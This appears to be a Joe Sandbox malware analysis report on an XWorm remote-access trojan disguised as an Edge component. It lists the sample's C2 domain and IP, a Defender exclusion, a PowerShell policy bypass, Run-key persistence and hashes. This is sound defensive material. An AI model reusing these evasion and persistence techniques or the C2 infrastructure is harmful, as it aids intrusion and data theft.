              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\msedge.exeQueries volume information: C:\Users\user\AppData\Roaming\msedge.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\msedge.exeQueries volume information: C:\Users\user\AppData\Roaming\msedge.exe VolumeInformation
              Source: C:\Users\user\Desktop\msedge_visual_render.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: msedge_visual_render.exe, 00000000.00000002.3340935332.000000001B580000.00000004.00000020.00020000.00000000.sdmp, msedge_visual_render.exe, 00000000.00000002.3340935332.000000001B613000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: msedge_visual_render.exe, 00000000.00000002.3340935332.000000001B613000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ws Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\msedge_visual_render.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\msedge_visual_render.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\msedge_visual_render.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\msedge_visual_render.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\msedge_visual_render.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\msedge_visual_render.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\msedge_visual_render.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\msedge_visual_render.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected XWorm
              Source: Yara matchFile source: msedge_visual_render.exe, type: SAMPLE
              Source: Yara matchFile source: 0.0.msedge_visual_render.exe.3f0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.3338785172.0000000012701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000000.2055237317.00000000003F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msedge_visual_render.exe PID: 1992, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\msedge.exe, type: DROPPED

              Remote Access Functionality

              barindex
              Yara detected XWorm
              Source: Yara matchFile source: msedge_visual_render.exe, type: SAMPLE
              Source: Yara matchFile source: 0.0.msedge_visual_render.exe.3f0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.3338785172.0000000012701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000000.2055237317.00000000003F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msedge_visual_render.exe PID: 1992, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\msedge.exe, type: DROPPED

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
              Windows Management Instrumentation              		21
              Registry Run Keys / Startup Folder              		11
              Process Injection              		1
              Masquerading              		OS Credential Dumping221
              Security Software Discovery              		Remote Services11
              Archive Collected Data              		1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              PowerShell              		1
              DLL Side-Loading              		21
              Registry Run Keys / Startup Folder              		11
              Disable or Modify Tools              		LSASS Memory1
              Process Discovery              		Remote Desktop ProtocolData from Removable Media1
              Non-Standard Port              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              DLL Side-Loading              		131
              Virtualization/Sandbox Evasion              		Security Account Manager131
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive1
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
              Process Injection              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture11
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information              		LSA Secrets1
              File and Directory Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Obfuscated Files or Information              		Cached Domain Credentials13
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
              Software Packing              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1556740 Sample: msedge_visual_render.exe Startdate: 15/11/2024 Architecture: WINDOWS Score: 100 36 23.ip.gl.ply.gg 2->36 42 Suricata IDS alerts for network traffic 2->42 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 48 9 other signatures 2->48 8 msedge_visual_render.exe 1 5 2->8         started        13 msedge.exe 2->13         started        15 msedge.exe 2->15         started        signatures3 process4 dnsIp5 38 23.ip.gl.ply.gg 147.185.221.23, 49862, 49908, 49950 SALSGIVERUS United States 8->38 34 C:\Users\user\AppData\Roaming\msedge.exe, PE32 8->34 dropped 50 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->50 52 Protects its processes via BreakOnTermination flag 8->52 54 Bypasses PowerShell execution policy 8->54 56 Adds a directory exclusion to Windows Defender 8->56 17 powershell.exe 23 8->17         started        20 powershell.exe 23 8->20         started        22 powershell.exe 23 8->22         started        24 powershell.exe 21 8->24         started        58 Multi AV Scanner detection for dropped file 13->58 60 Machine Learning detection for dropped file 13->60 file6 signatures7 process8 signatures9 40 Loading BitLocker PowerShell Module 17->40 26 conhost.exe 17->26         started        28 conhost.exe 20->28         started        30 conhost.exe 22->30         started        32 conhost.exe 24->32         started        process10

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              msedge_visual_render.exe74%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
              msedge_visual_render.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\msedge.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Roaming\msedge.exe74%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://www.verisign.0%Avira URL Cloudsafe
              https://go.m0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              23.ip.gl.ply.gg
              		147.185.221.23
              		truefalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                23.ip.gl.ply.ggfalse
                  		high

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2136913212.000001CFE44C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2213548272.00000184DA741000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2344287876.0000020A23251000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2509527008.000002C7F46F0000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000A.00000002.2396438363.000002C7E48A9000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.2122069386.000001CFD4679000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2168718628.00000184CA8F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2259166369.0000020A13408000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2396438363.000002C7E48A9000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000A.00000002.2396438363.000002C7E48A9000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.2122069386.000001CFD4679000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2168718628.00000184CA8F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2259166369.0000020A13408000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2396438363.000002C7E48A9000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.micom/pkiops/Docs/ry.htm0powershell.exe, 00000005.00000002.2224332852.00000184E2AF8000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://contoso.com/powershell.exe, 0000000A.00000002.2509527008.000002C7F46F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2136913212.000001CFE44C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2213548272.00000184DA741000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2344287876.0000020A23251000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2509527008.000002C7F46F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.microsoft.copowershell.exe, 00000008.00000002.2356985034.0000020A2B57F000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://contoso.com/Licensepowershell.exe, 0000000A.00000002.2509527008.000002C7F46F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://crl.micpowershell.exe, 00000008.00000002.2362125678.0000020A2B89B000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://contoso.com/Iconpowershell.exe, 0000000A.00000002.2509527008.000002C7F46F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://crl.micft.cMicRosofpowershell.exe, 00000008.00000002.2362125678.0000020A2B89B000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://aka.ms/pscore68powershell.exe, 00000002.00000002.2122069386.000001CFD4451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2168718628.00000184CA6D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2259166369.0000020A131E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2396438363.000002C7E4681000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.verisign.powershell.exe, 0000000A.00000002.2526355143.000002C7FC9E2000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namemsedge_visual_render.exe, 00000000.00000002.3303162945.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2122069386.000001CFD4451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2168718628.00000184CA6D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2259166369.0000020A131E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2396438363.000002C7E4681000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://go.mpowershell.exe, 00000002.00000002.2142783019.000001CFECB60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://github.com/Pester/Pesterpowershell.exe, 0000000A.00000002.2396438363.000002C7E48A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://crl.microspowershell.exe, 00000008.00000002.2360202768.0000020A2B710000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high

                                                    World Map of Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public IPs

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    147.185.221.23
                                                    		23.ip.gl.ply.ggUnited States
                                                    		12087SALSGIVERUSfalse

                                                    General Information

                                                    Joe Sandbox version:41.0.0 Charoite
                                                    Analysis ID:1556740
                                                    Start date and time:2024-11-15 22:09:10 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 6m 18s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:15
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:msedge_visual_render.exe
                                                    Detection:MAL
                                                    Classification:mal100.troj.evad.winEXE@15/20@1/1
                                                    EGA Information:
                                                    • Successful, ratio: 14.3%
                                                    HCA Information:
                                                    • Successful, ratio: 98%
                                                    • Number of executed functions: 62
                                                    • Number of non-executed functions: 6
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe

                                                    Warnings

                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                    • Execution Graph export aborted for target msedge.exe, PID 2408 because it is empty
                                                    • Execution Graph export aborted for target msedge.exe, PID 616 because it is empty
                                                    • Execution Graph export aborted for target powershell.exe, PID 3944 because it is empty
                                                    • Execution Graph export aborted for target powershell.exe, PID 5136 because it is empty
                                                    • Execution Graph export aborted for target powershell.exe, PID 5948 because it is empty
                                                    • Execution Graph export aborted for target powershell.exe, PID 984 because it is empty
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    • VT rate limit hit for: msedge_visual_render.exe

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    16:10:06API Interceptor49x Sleep call for process: powershell.exe modified
                                                    16:10:52API Interceptor950444x Sleep call for process: msedge_visual_render.exe modified
                                                    22:10:55AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run msedge C:\Users\user\AppData\Roaming\msedge.exe
                                                    22:11:03AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run msedge C:\Users\user\AppData\Roaming\msedge.exe
                                                    22:11:12AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    147.185.221.23exe030.exeGet hashmaliciousXWormBrowse
                                                      pQm8Ci3Dov.exeGet hashmaliciousXWormBrowse
                                                        jkL96SLfWS.exeGet hashmaliciousXWormBrowse
                                                          xtrSvgqQEW.exeGet hashmaliciousXWormBrowse
                                                            7PRbdkCn03.exeGet hashmaliciousXWormBrowse
                                                              8Hd0ZExgJz.exeGet hashmaliciousBlank Grabber, Umbral Stealer, XWormBrowse
                                                                6qwSgLbPO9.exeGet hashmaliciousXWormBrowse
                                                                  RLesaPFXew.exeGet hashmaliciousSilverRatBrowse
                                                                    rboancbWce.exeGet hashmaliciousXWormBrowse
                                                                      dUoETPmfo3.exeGet hashmaliciousOrcusBrowse

                                                                        Domains

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        23.ip.gl.ply.gg7PRbdkCn03.exeGet hashmaliciousXWormBrowse
                                                                        • 147.185.221.23
                                                                        8Hd0ZExgJz.exeGet hashmaliciousBlank Grabber, Umbral Stealer, XWormBrowse
                                                                        • 147.185.221.23
                                                                        RLesaPFXew.exeGet hashmaliciousSilverRatBrowse
                                                                        • 147.185.221.23
                                                                        r8gcHFIf3x.exeGet hashmaliciousXWormBrowse
                                                                        • 147.185.221.23
                                                                        q0SpP6HxtE.exeGet hashmaliciousXWormBrowse
                                                                        • 147.185.221.23

                                                                        ASNs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        SALSGIVERUSexe030.exeGet hashmaliciousXWormBrowse
                                                                        • 147.185.221.23
                                                                        pQm8Ci3Dov.exeGet hashmaliciousXWormBrowse
                                                                        • 147.185.221.23
                                                                        jkL96SLfWS.exeGet hashmaliciousXWormBrowse
                                                                        • 147.185.221.23
                                                                        xtrSvgqQEW.exeGet hashmaliciousXWormBrowse
                                                                        • 147.185.221.23
                                                                        7PRbdkCn03.exeGet hashmaliciousXWormBrowse
                                                                        • 147.185.221.23
                                                                        8Hd0ZExgJz.exeGet hashmaliciousBlank Grabber, Umbral Stealer, XWormBrowse
                                                                        • 147.185.221.23
                                                                        6qwSgLbPO9.exeGet hashmaliciousXWormBrowse
                                                                        • 147.185.221.23
                                                                        RLesaPFXew.exeGet hashmaliciousSilverRatBrowse
                                                                        • 147.185.221.23
                                                                        mips.elfGet hashmaliciousMirai, MoobotBrowse
                                                                        • 147.176.207.108
                                                                        rboancbWce.exeGet hashmaliciousXWormBrowse
                                                                        • 147.185.221.23

                                                                        JA3 Fingerprints

                                                                        No context

                                                                        Dropped Files

                                                                        No context

                                                                        Created / dropped Files

                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\msedge.exe.log

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Roaming\msedge.exe
                                                                        File Type:CSV text
                                                                        Category:dropped
                                                                        Size (bytes):654
                                                                        Entropy (8bit):5.380476433908377
                                                                        Encrypted:false
                                                                        SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                        MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                        SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                        SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                        SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                        Malicious:false
                                                                        Reputation:moderate, very likely benign file
                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:modified
                                                                        Size (bytes):64
                                                                        Entropy (8bit):0.34726597513537405
                                                                        Encrypted:false
                                                                        SSDEEP:3:Nlll:Nll
                                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                        Malicious:false
                                                                        Preview:@...e...........................................................

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_21cpb55e.ov0.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_53yspfud.fuk.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ambi105q.wbg.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cjivm1yh.if1.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ckwbbm2z.ehe.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_erd0431n.yle.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_izsuxymi.tme.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
